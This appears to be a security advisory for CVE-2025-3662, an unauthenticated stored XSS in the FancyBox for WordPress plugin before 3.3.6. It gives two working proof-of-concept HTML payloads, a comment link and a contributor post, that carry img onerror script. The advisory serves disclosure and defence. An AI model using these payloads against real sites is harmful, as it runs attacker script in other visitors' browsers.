FancyBox for WordPress < 3.3.6 – Unauthenticated Stored XSS | CVE 2025-3662

Description

The plugin does not escape captions and titles attributes before using them to populate galleries' caption fields. The issue was received as a Contributor+ Stored XSS, however one of our researcher (Marc Montpas) escalated it to an Unauthenticated Stored XSS

Proof of Concept

-- Escalated to Unauthenticated Stored XSS by Marc Montpas:

1. Activate the plugin.
2. Make sure anyone can comments on the site's posts
3. As a regular unauthenticated visitor, post a comment with the following content:

<a href="https://wpscan.com/test.jpg" title="&lt;img src=x onerror=alert('xss')&gt;">Click here for XSS :mrgreen: </a>

If another user clicks on the comment's link, the malicious JS is executed.

-- Original PoC (Contributor+ Stored XSS) from submitter:

Alternatively, a logged-in user with at least the contributor role can write a post with the following attack payload (to out while in code editor mode) to abuse the same attack vector:

<a data-caption="&lt;img src=x onerror=&quot;alert()&quot;&gt;" href="http://example.com/foo.jpg">Click me<img src="http://example.com/foo.jpg"></a>